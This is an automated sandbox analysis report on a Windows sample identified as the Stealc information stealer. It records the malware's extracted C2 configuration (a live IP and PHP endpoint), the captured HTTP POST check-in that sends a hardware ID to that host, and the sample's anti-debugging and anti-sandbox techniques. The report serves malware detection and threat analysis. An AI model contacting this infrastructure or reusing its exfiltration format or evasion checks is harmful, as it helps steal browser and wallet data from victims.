Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1523253
MD5: 7104794e5bc6d9668df3a837983e43df
SHA1: 6bbeef17a4443db7e332123055796aace85064d6
SHA256: e1eca91fddecc4eb0729d7a47e7950cd07bcfe3a195721c2ea132e79654a9fbf
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7104794E5BC6D9668DF3A837983E43DF)
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6968 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6968 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.470000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T11:06:56.881309+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.470000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.php2 | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php( | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php$ | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php0 | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php/ | Virustotal: Detection: 17%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0047C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00477240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00477240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00479AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00479B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00479B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00488EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00488EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004838B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00484910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00484910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0047DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0047E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00484570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00484570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0047ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0047BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0047DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004716D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00483EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00483EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0047F6B0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 46 36 39 45 33 34 37 32 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------IEBFHCAKFBGDHIDHIDBK
Content-Disposition: form-data; name="hwid"

1BF69E3472EB3294564547
------IEBFHCAKFBGDHIDHIDBK
Content-Disposition: form-data; name="build"

doma
------IEBFHCAKFBGDHIDHIDBK--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00474880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00474880
Source: unknown | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 46 36 39 45 33 34 37 32 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------IEBFHCAKFBGDHIDHIDBK
Content-Disposition: form-data; name="hwid"

1BF69E3472EB3294564547
------IEBFHCAKFBGDHIDHIDBK
Content-Disposition: form-data; name="build"

doma
------IEBFHCAKFBGDHIDHIDBK--
Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php2
Source: file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37a

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE 0_2_008470EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081405A 0_2_0081405A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083E98A 0_2_0083E98A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00836992 0_2_00836992
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0079E1FD 0_2_0079E1FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D525A 0_2_007D525A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00834AB7 0_2_00834AB7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00843AFE 0_2_00843AFE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C03EB 0_2_007C03EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00839B55 0_2_00839B55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083337B 0_2_0083337B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00848C69 0_2_00848C69
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C65EE 0_2_007C65EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084056C 0_2_0084056C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00791E63 0_2_00791E63
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083B631 0_2_0083B631
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084566A 0_2_0084566A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083CFC3 0_2_0083CFC3
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 004745C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: gbgxsggn ZLIB complexity 0.9950286764152364
Source: file.exe, 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00489600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00489600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00483720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00483720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SLZY7IB3.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1856512 > 1048576
Source: file.exe | Static PE information: Raw size of gbgxsggn is bigger than: 0x100000 < 0x19f200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.470000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gbgxsggn:EW;lycvdkjm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gbgxsggn:EW;lycvdkjm:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00489860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c8b51 should be: 0x1cdca0
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: gbgxsggn
Source: file.exe | Static PE information: section name: lycvdkjm
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008CA0CD push ebp; mov dword ptr [esp], edi 0_2_008CA232
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push ebx; mov dword ptr [esp], 7143CB12h 0_2_0087E8CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push esi; mov dword ptr [esp], 350B16FAh 0_2_0087E9C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push 7897271Ah; mov dword ptr [esp], ecx 0_2_0087E9E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push 0094117Bh; mov dword ptr [esp], ebx 0_2_0087EA3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push edx; mov dword ptr [esp], ecx 0_2_0087EA45
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push edi; mov dword ptr [esp], 7FEAC600h 0_2_0087EA6E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push ebx; mov dword ptr [esp], edx 0_2_0087EB22
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087E8C5 push eax; mov dword ptr [esp], edi 0_2_0087EB48
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009340CA push esi; mov dword ptr [esp], edi 0_2_0093411F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 5DF1614Eh; mov dword ptr [esp], ecx 0_2_008470F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 75952BD9h; mov dword ptr [esp], esp 0_2_008470FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 577BDCD8h; mov dword ptr [esp], eax 0_2_00847107
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push ecx; mov dword ptr [esp], 7B6D5C07h 0_2_00847181
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push eax; mov dword ptr [esp], ecx 0_2_008471AC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 0A84D161h; mov dword ptr [esp], ebx 0_2_008471DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 43DAD500h; mov dword ptr [esp], eax 0_2_00847232
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 04E0A463h; mov dword ptr [esp], edx 0_2_00847258
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push ebx; mov dword ptr [esp], edx 0_2_0084728A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push edi; mov dword ptr [esp], 0F4B41A9h 0_2_008472D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 702D5DA7h; mov dword ptr [esp], ebx 0_2_00847304
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 254253A1h; mov dword ptr [esp], esp 0_2_00847319
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push eax; mov dword ptr [esp], ebx 0_2_008473C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 439D5E55h; mov dword ptr [esp], esi 0_2_00847443
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push edx; mov dword ptr [esp], 7BF4A8F4h 0_2_008474DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 061708AAh; mov dword ptr [esp], esi 0_2_00847514
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push ebp; mov dword ptr [esp], edi 0_2_0084756B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 702ED301h; mov dword ptr [esp], ebp 0_2_0084757B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 464B79A3h; mov dword ptr [esp], edx 0_2_0084763D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push 23E74B00h; mov dword ptr [esp], ebp 0_2_00847659
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008470EE push edx; mov dword ptr [esp], 00000069h 0_2_0084767D
Source: file.exe | Static PE information: section name: gbgxsggn entropy: 7.953932899320452

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00489860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13602
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6D1AC5 second address: 6D1ADA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b jnp 00007F7F1CE19AA6h 0x00000011 pop edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E9DA second address: 84E9FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F1D21A777h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84E9FD second address: 84EA01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84EA01 second address: 84EA21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F7F1D21A773h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84EA21 second address: 84EA3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1CE19AB3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84EA3A second address: 84EA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84EBA1 second address: 84EBAD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F1CE19AAEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84EE31 second address: 84EE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jl 00007F7F1D21A766h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
